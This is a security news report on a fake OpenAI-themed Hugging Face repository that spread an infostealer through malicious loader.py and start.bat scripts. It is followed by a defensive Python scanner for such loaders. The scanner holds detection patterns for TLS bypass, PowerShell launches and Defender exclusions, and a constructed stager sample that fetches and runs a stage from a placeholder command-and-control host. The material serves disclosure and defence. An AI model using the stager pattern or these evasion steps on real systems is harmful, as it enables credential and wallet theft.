Fake OpenAI Hugging Face Repo Spread Infostealer to 244,000 Downloads
Updated · rescana.com · May 11
Researchers found a fake OpenAI-themed Hugging Face repository used in a supply-chain attack that pushed a Rust-based infostealer before the project was removed.
The repository mimicked legitimate AI tools, used typosquatting, trending-list manipulation and SEO promotion, and inflated its own popularity with bots to lure developers and researchers.
A malicious loader.py disabled SSL checks, fetched remote instructions, launched PowerShell and batch scripts, then installed the final payload from attacker-controlled infrastructure.
The malware stole browser passwords, cookies, session tokens, Discord tokens, SSH and VPN credentials, crypto wallets, local keys and screenshots, while evading sandboxes and adding Defender exclusions.
The case highlights rising risk in public AI model registries, with responders urging affected users to reimage machines, rotate all credentials and monitor traffic to known command-and-control domains.
244,000 Downloads, 667 Fake Likes: Inside the Largest AI Supply Chain Attack on Hugging Face
Overview
A major AI supply chain attack was uncovered when a malicious repository called `Open-OSS/privacy-filter` appeared on the Hugging Face platform. This repository tricked users into downloading and running harmful scripts, `start.bat` for Windows or `loader.py` for Linux and macOS, under the guise of setting up a legitimate AI model. Once executed, these scripts compromised users' systems. Hugging Face quickly confirmed the repository violated its terms and removed it, but the incident highlights how attackers can exploit trusted platforms and developer habits to spread malware through open-source AI projects.
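A defender-side triage check for the loader behaviour described above (TLS verification disabled, remote instructions fetched, PowerShell or batch scripts launched, Defender exclusions added), written as an added example rather than code from the report or from the repository it describes. The indicator patterns, weights, risky script names and the two sample files are constructed assumptions for this example.

```python
"""Triage a checked-out model repository for setup scripts that behave like the
loader described in the report. Indicators, weights and samples are constructed
for this example and are not the real artefacts."""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# (indicator name, pattern, weight); weights are assumptions chosen for this example
INDICATORS: List[Tuple[str, re.Pattern, int]] = [
    ("tls_verify_disabled", re.compile(r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"), 3),
    ("remote_fetch", re.compile(r"requests\.get\(|urlopen\(|urlretrieve\(|Invoke-WebRequest|curl\s"), 1),
    ("shell_spawn", re.compile(r"(?i)\b(powershell(\.exe)?|cmd\.exe|subprocess\.(run|Popen|call))\b"), 2),
    ("encoded_payload", re.compile(r"b64decode\(|FromBase64String"), 2),
    ("defender_exclusion", re.compile(r"(?i)Add-MpPreference|-ExclusionPath"), 3),
]
# A model is loaded from weights and config files, not by executing a setup script,
# so these names are worth a look on their own. Assumed list for this example.
RISKY_SCRIPT_NAMES = {"loader.py", "start.bat", "setup.bat", "install.py", "run.bat"}
REVIEW_THRESHOLD = 4

def scan_text(filename: str, text: str) -> Dict:
    """Return the indicators matched in one file plus a weighted score and verdict."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if Path(filename).name.lower() in RISKY_SCRIPT_NAMES:
        hits.append("executable_setup_script")
        score += 2
    verdict = "review" if score >= REVIEW_THRESHOLD else "ok"
    return {"file": filename, "indicators": hits, "score": score, "verdict": verdict}

def scan_repo(root: Path) -> List[Dict]:
    """Scan every script-like file under a downloaded repository directory."""
    exts = {".py", ".bat", ".cmd", ".ps1", ".sh"}
    return [scan_text(str(p.relative_to(root)), p.read_text(errors="ignore"))
            for p in sorted(root.rglob("*")) if p.suffix.lower() in exts]

# Constructed samples: the shape of a stager as described in the report, and a benign loader.
SUSPECT_LOADER = """
import ssl, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
stage = urllib.request.urlopen("https://c2.example.invalid/stage").read()
subprocess.run(["powershell", "-File", "stage.ps1"])
"""
BENIGN_LOADER = """
from transformers import AutoModel
model = AutoModel.from_pretrained("org/model-placeholder")
"""

if __name__ == "__main__":
    for name, text in [("loader.py", SUSPECT_LOADER), ("load_model.py", BENIGN_LOADER)]:
        print(scan_text(name, text))
```

Run `scan_repo(Path("path/to/downloaded/repo"))` before executing anything a model card tells you to run; anything marked `review` deserves a manual read first.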